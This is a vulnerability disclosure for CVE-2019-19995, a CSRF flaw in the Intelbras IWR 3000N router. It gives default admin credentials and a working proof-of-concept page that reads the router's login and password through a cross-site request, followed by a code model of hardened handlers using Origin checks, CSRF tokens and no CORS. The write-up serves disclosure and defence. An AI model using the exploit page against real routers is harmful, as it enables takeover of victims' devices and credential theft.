CSRF — CVE-2019–19995
Dec 26, 2019
A CSRF issue was discovered on Intelbras IWR 3000N 1.8.7 devices, leading to complete control of the router, as demonstrated by v1/system/user.
Proof Of Concept
First Step —
Log in to the router's admin panel (credentials admin:admin123):
Second Step —
Create a page for the CSRF attack, as in the example below.
<html>
<head>
<title>IWR 3000N - CSRF on Exploit </title>
<!-- jQuery is loaded in the head so that $.get is defined by the time the button is clicked -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body>
<button onclick="exploit()">Exploit Button!</button>
<p>Click to get the login.</p>
<script>
// Cross-site GET to the router's user endpoint (10.0.0.1 is the router's LAN address).
// The victim's browser issues the request; the response body, which carries the
// login and password, is shown in an alert. On failure the XHR status is shown instead.
function exploit(){
  $.get( "http://10.0.0.1:80/v1/system/user" )
    .done(( data ) => {
      alert( data );
    })
    .fail(function( err, status ) {
      alert( status );
    });
}
</script>
</body>
</html>
Third Step —
Clicking the “Exploit” button sends the GET from the victim's browser, and the alert shows the response from /v1/system/user, which contains the login and password. Note that the attacker's page can only read the response body if the device's CORS headers permit it; the request itself is sent regardless, so state-changing endpoints are exposed even where the body cannot be read.
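To make the mechanism behind the three steps above concrete, here is an added example (not the original PoC and not Intelbras firmware): a small model of a router API handler in a vulnerable and a hardened form, together with the browser's CORS decision, showing why a cross-site GET like the one above can return the credentials and what a fix has to check. DEVICE_ORIGIN, the cookie and header names, the token value, the sample requests and the assumption that the router authorizes on a session cookie the browser attaches automatically are all assumptions for the sake of the example.

```javascript
// Added example, not the original PoC and not Intelbras firmware: a model of a
// router API handler in a vulnerable and a hardened form, plus the browser's
// CORS decision. DEVICE_ORIGIN, the cookie and header names, the token value and
// the sample requests are assumptions.

const DEVICE_ORIGIN = "http://10.0.0.1";                  // assumed router origin
const SECRET = { user: "admin", password: "admin123" };   // stand-in for the /v1/system/user body

// Assumption: a session cookie is what makes a request "logged in". The browser
// attaches it to requests to 10.0.0.1, including ones started by another site.
function isLoggedIn(req) {
  return !!(req.cookies && req.cookies.session === "valid-session");
}

function refererOrigin(referer) {
  if (!referer) return null;
  try { return new URL(referer).origin; } catch (e) { return null; }
}

// Vulnerable model: the session is the only check, and the CORS headers echo
// whatever Origin asked, so another site's script can read the body.
function vulnerableUserEndpoint(req) {
  if (!isLoggedIn(req)) return { status: 401, headers: {}, body: null };
  return {
    status: 200,
    headers: {
      "Access-Control-Allow-Origin": req.headers.origin || "*",
      "Access-Control-Allow-Credentials": "true",
    },
    body: SECRET,
  };
}

// Hardened model: three independent checks on top of the session.
//   1. Origin (or Referer when Origin is absent) must be the device itself.
//   2. A per-session CSRF token must arrive in a custom header: a cross-site
//      <form> or simple GET cannot add it, and the attacker's JS cannot read it.
//   3. No CORS headers at all, so the browser never exposes the body to another origin.
function hardenedUserEndpoint(req, expectedToken) {
  if (!isLoggedIn(req)) return { status: 401, headers: {}, body: null };
  const source = req.headers.origin || refererOrigin(req.headers.referer);
  if (source !== DEVICE_ORIGIN) {
    return { status: 403, headers: {}, body: { error: "cross-site request rejected" } };
  }
  if (req.headers["x-csrf-token"] !== expectedToken) {
    return { status: 403, headers: {}, body: { error: "missing or wrong CSRF token" } };
  }
  return { status: 200, headers: {}, body: SECRET };
}

// The browser's side of CORS for a credentialed cross-origin request: the body is
// exposed to the page only if Allow-Origin exactly equals the page's origin (a
// wildcard is rejected when credentials are sent) and Allow-Credentials is "true".
function crossOriginPageCanReadBody(res, pageOrigin) {
  const allowOrigin = res.headers["Access-Control-Allow-Origin"];
  const allowCreds = res.headers["Access-Control-Allow-Credentials"];
  return res.status === 200 && allowOrigin === pageOrigin && allowCreds === "true";
}

// Constructed requests. The first mirrors the PoC: a GET from a page on another
// origin, with the admin's session cookie attached by the browser.
const csrfRequest = {
  method: "GET", path: "/v1/system/user",
  headers: { origin: "http://attacker.example" },
  cookies: { session: "valid-session" },
};
// The second is what the router's own UI would send once it is fixed.
const legitimateRequest = {
  method: "GET", path: "/v1/system/user",
  headers: { origin: DEVICE_ORIGIN, "x-csrf-token": "tok-123" },
  cookies: { session: "valid-session" },
};

const leaked = vulnerableUserEndpoint(csrfRequest);
console.log("vulnerable, cross-site:", leaked.status,
  crossOriginPageCanReadBody(leaked, "http://attacker.example")
    ? "body readable by attacker page" : "body not readable");
console.log("hardened, cross-site:", hardenedUserEndpoint(csrfRequest, "tok-123").status);
console.log("hardened, own UI:", hardenedUserEndpoint(legitimateRequest, "tok-123").status);
```

The Origin check alone is not enough on its own (some clients omit Origin on GET, hence the Referer fallback, and neither header is sent by every client), which is why the token header is the check that actually carries the decision; dropping the reflected CORS headers is what stops the body from reaching the attacker's page even if a request gets through.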
Video —